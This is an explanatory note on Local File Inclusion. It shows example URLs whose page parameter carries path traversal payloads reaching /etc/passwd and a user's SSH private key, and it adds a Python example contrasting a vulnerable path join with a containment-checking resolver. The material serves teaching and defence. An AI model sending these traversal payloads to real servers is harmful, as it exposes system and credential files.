Local File Inclusion

To test for LFI, we need a parameter in a URL or any other input field, such as the request body. For example, if the website is tryhackme.com, a parameter in the URL can look like https://tryhackme.com/?file=robots.txt. Here, file is the name of the parameter and robots.txt is the value we are passing (include the file robots.txt).

Usage

* Exploit URL parameter
```
http://example.com/home?page=about.html
```
* The value is changed to a path traversal sequence, targeting [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
```
http://example.com/home?page=../../../../etc/passwd
```
or
```
http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
```
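
The server-side view of the `page` parameter above, as an added example that is not part of the original page: a naive join lets `../` segments leave the web root, while canonicalising the path and checking containment rejects them. The function names, the temporary web root and its `about.html` file are constructed for illustration.

```python
import os
import tempfile
from urllib.parse import urlsplit, parse_qs

class RejectedPath(Exception):
    """Raised when the requested page must not be served."""

def naive_resolve(web_root, page):
    # Vulnerable pattern: the parameter is joined to the root unchecked,
    # so "../" segments walk out of the directory.
    return os.path.normpath(os.path.join(web_root, page))

def safe_resolve(web_root, page):
    # Canonicalise both paths (symlinks and ".." resolved), then require
    # the result to be an existing file under the web root.
    if "\x00" in page:
        raise RejectedPath("NUL byte in parameter")
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, candidate]) != root:
        raise RejectedPath(page)
    if not os.path.isfile(candidate):
        raise RejectedPath(page)
    return candidate

def page_param(url):
    # parse_qs percent-decodes once, as a web framework would.
    return parse_qs(urlsplit(url).query).get("page", [""])[0]

# Constructed sample requests; the first two come from the page's examples.
SAMPLE_URLS = [
    "http://example.com/home?page=about.html",
    "http://example.com/home?page=../../../../etc/passwd",
    "http://example.com/home?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "http://example.com/home?page=/etc/passwd",
]

def demo():
    results = {}
    with tempfile.TemporaryDirectory() as web_root:
        with open(os.path.join(web_root, "about.html"), "w") as fh:
            fh.write("<h1>about</h1>")
        for url in SAMPLE_URLS:
            try:
                safe_resolve(web_root, page_param(url))
                results[url] = "served"
            except RejectedPath:
                results[url] = "rejected"
    return results
```

The containment check runs after decoding and canonicalisation, so the percent-encoded and absolute-path variants are rejected by the same test as the plain `../` form.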